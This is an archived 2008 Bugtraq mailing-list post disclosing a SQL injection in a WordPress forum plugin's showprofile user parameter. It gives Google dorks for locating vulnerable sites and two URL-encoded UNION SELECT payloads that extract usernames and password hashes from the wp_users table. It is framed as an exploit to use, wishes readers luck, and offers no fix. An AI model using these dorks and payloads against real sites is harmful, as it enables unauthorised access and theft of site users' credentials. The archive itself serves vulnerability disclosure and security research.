lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 16 Feb 2008 16:49:10 -0000 From: hackturkiye.hackturkiye@...il.com To: bugtraq@...urityfocus.com Subject: WordPress forumaction (PAGE_id)(user)SQL Injection ######################################################################### # # WordPress forumaction(PAGE_İD)(user)SQL Injection # ######################################################################### # # AUTHOR : S@BUN # # HOME : http://www.hackturkiye.com/ # ######################################################################### # # DORK 1 : allinurl: forumaction "showprofile" # DORK 2 : allinurl: page_id user "showprofile" DORK 3 : allinurl:"forum/?forumaction" ########################################################################## # # showprofile&user=SQL Injection(EXPLOİT) # ########################################################################### EXPLOİT 1 showprofile&user=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cconcat(0x7c,user_login,0x7c,user_pass,0x7c)%2C0%2C0%2C0%2C0x7c%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fwp_users EXPLOİT 2 showprofile&user=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0%2C0%2C0x7c%2C0%2C0%2C0%2Cconcat(0x7c,user_login,0x7c,user_pass,0x7c)%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fwp_users ########################################################################## # S@BUN GOOD LUCKY S@BUN ##########################################################################
Powered by blists - more mailing lists